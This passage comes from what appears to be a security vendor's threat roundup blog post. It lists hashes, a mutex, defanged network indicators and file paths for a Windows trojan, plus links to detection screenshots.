/><ul><li>05997180a42ca9c01720b1ee3e759bd1a408c0064bbdac0c72f56c9783102a1f</li><li>07a8a906e93699e23b1b7fe6a190edf709d499efdb806a334d63d21e87d47fea</li><li>0d4e2eeb6402ecbfed9d9f70a4386ba988d96baa4570944ad7d25fda4e1360b5</li><li>1007b22475717247803c61a571c881bf50d93199f21559bfaa2b0651e3e88b99</li><li>11cd2e32f5b99a2988d75e7c6b7b372645385fa0b2f266084cf79a674fa87d54</li><li>12cb9af05b67398d8e32296f872fcf38485cb5bfb248882a039c901f917744c7</li><li>199abec0369aa5b56ccf3e40104dec650c0c621a4bf9fe892cde4c649951d96c</li><li>2436eb88be5cb4536470f00aa4e0b2204c938a7ccc1ab1512c51371c056083bb</li><li>2b99f6c10d40f9437e4f81c102829e5dd177b7ba83f04d0b09ca13fd35d4f37a</li><li>2e1d18fa4a0c1b7f1a840f0cbe366bed742fd882ba5ba7c32177fe4384d3feeb</li><li>2fcb4649130e60c9ee30bc0109dd276dfc20b58873098466740c95bae14e8b16</li><li>2fda76c3f4db61bd48ffefbe06625cbf33c84c9a99bfb5e4b078efab041786be</li><li>4c7833eda85621233fcf983d797da0a473e4d17bc8a6b5572eb475e1132f9604</li><li>4cf4a24b619e53b5155e2aa5eebcbd4a935b03bc2a99f703e955d26bfdc89834</li><li>522dea36276bb7616dabda4f46e9bd93fb5fac7dc8c035e2677febac8a9ac268</li><li>53bfd8dcca2dd1a702c80a92e52b6149c3b6d9dd69cfc616c6ece3931920aa0b</li><li>56ee72c3cac7e50c20945307e9f58360e097782ee10a5577323f1cee22caeb3d</li><li>5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7</li><li>5dfef0b6f4f1b612edf80c8ab5cffc7556677bb07c53934963b550b60cf84474</li><li>6534a9d590748b2301a3f804b75fe02ffee39acf82d2dbb93800a3f8923c9934</li><li>6b83c696d85d8f467ee9ff306ef266c6b64c8cb4e0aad99f4b5627f6e2dd3c33</li><li>6c891decc602dc22ae6084be690674afdb405c5b7072a0e8b46d77ba8e331237</li><li>6da86b5ba028ddfd9646da6467cdaca4d698b72b165045561bcf7a65449dba85</li><li>7546344c7c370e86f9975710269a9c965104d6084fe4b51d8713c37cd277c2da</li><li>75a14beabec965f401a21c1809b7fe9563ced7366c863e78dd5c744516aea83d</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-TpEILP4aGVQ/W9yM6dpVQlI/AAAAAAAABGA/C0OtXw35DQAcdfZ4dMzNYKMEwd-CJ1kwwCLcBGAs/s1600/75a14beabec965f401a21c1809b7fe9563ced7366c863e78dd5c744516aea83d_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-TpEILP4aGVQ/W9yM6dpVQlI/AAAAAAAABGA/C0OtXw35DQAcdfZ4dMzNYKMEwd-CJ1kwwCLcBGAs/s400/75a14beabec965f401a21c1809b7fe9563ced7366c863e78dd5c744516aea83d_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-kfHYHySD5PE/W9yM_wWFQvI/AAAAAAAABGE/xV9M_34Q5y4uEZz50fTsf9rOKCkIS_9CACLcBGAs/s1600/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-kfHYHySD5PE/W9yM_wWFQvI/AAAAAAAABGE/xV9M_34Q5y4uEZz50fTsf9rOKCkIS_9CACLcBGAs/s640/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-4fATIapaiuo/W9yNEmQofTI/AAAAAAAABGI/VZVAxZKPoBALwp5teSqJiBoLc5im099CQCLcBGAs/s1600/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-4fATIapaiuo/W9yNEmQofTI/AAAAAAAABGI/VZVAxZKPoBALwp5teSqJiBoLc5im099CQCLcBGAs/s640/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-tA6vC5fR8Wg/W9yNHyg4tcI/AAAAAAAABGM/SQRvLKA1MJ4U_2S8dwL1z_DROqQ_kLg2QCLcBGAs/s1600/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://4.bp.blogspot.com/-tA6vC5fR8Wg/W9yNHyg4tcI/AAAAAAAABGM/SQRvLKA1MJ4U_2S8dwL1z_DROqQ_kLg2QCLcBGAs/s640/5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7_malware.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Trojan.Mikey-6735890-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>qazwsxedc</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>52[.]1[.]22[.]171</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>www[.]easycounter[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\cer61A0.tmp</li><li>%TEMP%\adminpak.msi</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\adminpak[1].exe</li><li>%WinDir%\cluster\clcfgsrv.inf</li><li>%WinDir%\cluster\cluadmin.exe</li></ul><b>File Hashes</b><br /><ul><li>04a44c6f9ee4b5f944038452d2669a9915e493f3d4aedd8603af6bcbf9fb157d</li><li>075ef3a40de2c10d52140c02fc604654e60eb1231659122640d93884a8f639d8</li><li>1ed41ccdce4f7c67dbeb57873ed69a0b53bd8c509a66f391fb4838cd26d32f88</li><li>4e8da970321ee8e38f2fe918ce8755ce504d0c54ad579c7a2d388ed65aceca3f</li><li>63562fa34ca55cbbc1f007ed6a199b625f277f02487d18c6a9a8e24354af6ea3</li><li>72b02849c7cde8ba42dfe04edf18b0ede900c66187a9e38f5d16eaf84ddfbfbe</li><li>764947d95583d3a134fc96d6ce06ce4175261d3b9b48d224238367054e187d93</li><li>77515fa3f7bea9043e954ac8cb13917edd930d0e5d87f2cbc9fa4d44bd281161</li><li>7ea545f0dd17684011d7bbdde7c004faccacd8edb6d011c4e023f2780279ae1f</li><li>92e4863e96df84117c1288ceb692823a6d86c0b3a09f29a5cbc4af6a83a03415</li><li>9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80</li><li>a36d16238efb3b5f2ba5e9c23dd1db26a6b08fce8fa1d824e3006bc05f12a75f</li><li>b63310bff942d0fe4f131fbb777737b110ab630876e784ac843e0c4dcdebde44</li><li>bdc574d0160c6566738b039122d702a47aa10080b096cc3ca2729a2a5ca5f6f6</li><li>cf7236e1d8783d00cd54d9d821a1067a2c08cd7cb67b0c091f5826784403f67a</li><li>d7096f8904ebef796193afca1737f99e65c07ac7cf3c999aa46b5e60428ca006</li><li>dba090f098676f7f4d5bd9e71a5b24cb1dfc71edb6b8a0dc06082a60730a81d0</li><li>ed2893a0c58fbfaf73acdd4d7a7c9d8626e8609573739e8f0bf11c88d4b07303</li><li>f9de2da81894bbde4f6baf5909c3f3f6a5d5fc61a8df97836fb8db14fbdb6006</li><li>ff453440448d5f950a573ab246092a3c80e33c7c9189d97d15539bf09c48211d</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-ZcPwrtqkwvA/W9yNYeBgclI/AAAAAAAABGo/EqYoWehoASk7HE5gRAtxc0MNcazfDW8kwCLcBGAs/s1600/9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-ZcPwrtqkwvA/W9yNYeBgclI/AAAAAAAABGo/EqYoWehoASk7HE5gRAtxc0MNcazfDW8kwCLcBGAs/s400/9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-646QP_YocxI/W9yNeGnBUtI/AAAAAAAABGs/lRZETrRD898Zs3fkcQps8ToOjS3T3Jb3ACLcBGAs/s1600/9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-646QP_YocxI/W9yNeGnBUtI/AAAAAAAABGs/lRZETrRD898Zs3fkcQps8ToOjS3T3Jb3ACLcBGAs/s640/9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80_tg.png" width="640" /></a></div><b><br /></b></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/P0-b_jT0_Oo" height="1" width="1" alt=""/>2018-12-13T14:24:04.692-05:000https://blog.talosintelligence.com/2018/11/threat-roundup-1019-1102.html